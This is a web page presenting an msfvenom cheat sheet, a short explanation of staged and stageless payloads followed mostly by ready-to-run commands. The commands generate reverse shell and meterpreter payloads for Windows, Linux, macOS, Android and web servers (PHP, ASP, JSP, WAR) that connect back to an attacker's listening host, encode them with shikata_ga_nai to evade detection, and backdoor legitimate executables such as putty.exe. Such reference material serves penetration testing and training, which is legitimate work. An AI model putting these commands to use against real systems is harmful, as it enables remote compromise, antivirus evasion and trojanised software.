Msfvenom Cheat Sheet

A Cyber Security Research Dumpsite

Msfvenom Cheat Sheet

A quick cheat sheet for Msfvenom

Msfvenom:

Definition

Msfvenom is capable of creating a wide variety of payloads across multiple languages, systems and architectures.

When using msfvenom, you first select the payload you wish to send. (You can see a full list of payloads using the –list option.)

Payloads come in two main categories: staged and stageless. Staged payloads create a small ‘dumb’ stub that is used to pull down the full payload after it is executed. This gives the benefit of a smaller initial payload, but requires outbound TCP communication to complete.

Stagless are larger by comparison but contain everything required in one payload.

Once the payload is selected an optional encoder can be applied. Encoders can be used to obfuscate the payload from detection or to convert it to to a specific format such as the PHP magic_quotes encoder.

The next step is to apply any parameters such as bad characters ports and hosts.

The final stage is to select the language and file output. Msfvenom can output in most common file formats and languages, e.g. exe, elf, php, asp. It can also output the raw shellcode in languages like Python and C.

For a full list of formats, use the –help-formats options along with the -h option.

Cheat Sheet:

Creating a Payload:
msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport]

  • Examples:
  • Generating a reverse meterpreter shell:
    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.21.1.1 lport=443 -f exe -o shell.exe
  • Windows x64 stageless reverse shell TCP payload:
    msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1 lport=443 -f exe -o shell.exe


Check Payload Option:
msfvenom -p [payload] –payload-options

  • Example:
  • msfvenom -p windows/x64/meterpreter/reverse_tcp –payload-options

Encoding a Payload:
msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] <var=value> > outputfile

Enconders Available: (Will only list excellent ones, check the rest on Jsitech GitHub Page) or run:

msfvenom -l encoders

  • Example:
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.40 LPORT=4444 -e x86/shikata_ga_nai -f exe -o payload.exe

Creating a Payload using a Template:
msfvenom -p [payload] <var=value> -x [template] -f [formattype] > outputfile

  • Example:
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -x putty.exe -f exe > evilputty.exe

 

More Payloads

Command

Info

Binaries

A binary payload is a set of binary files, configuration files, batch, or Shell scripts. Binary payload deployment refers to the deployment of a custom binary payload across environments. 

msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe

Creates a simple TCP Payload for Windows

msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe

Creates a simple HTTP Payload for Windows

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf

Creates a simple TCP Shell for Linux

msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho

Creates a simple TCP Shell for Mac

msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk

Creates a simple TCP Payload for Android

Web Payloads

msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php

Creates a Simple TCP Shell for PHP

msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp

Creates a Simple TCP Shell for ASP

msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp

Creates a Simple TCP Shell for Javascript

msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war

Creates a Simple TCP Shell for WAR

Windows Payloads

msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe

Binds an exe with a Payload (Backdoors an exe)

msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe

Creates a simple TCP payload with shikata_ga_nai encoder

msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe

Binds an exe with a Payload and encodes it

 

More Payloads on: http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/

Alternatively, Offensive Security has a good article on msfvenom: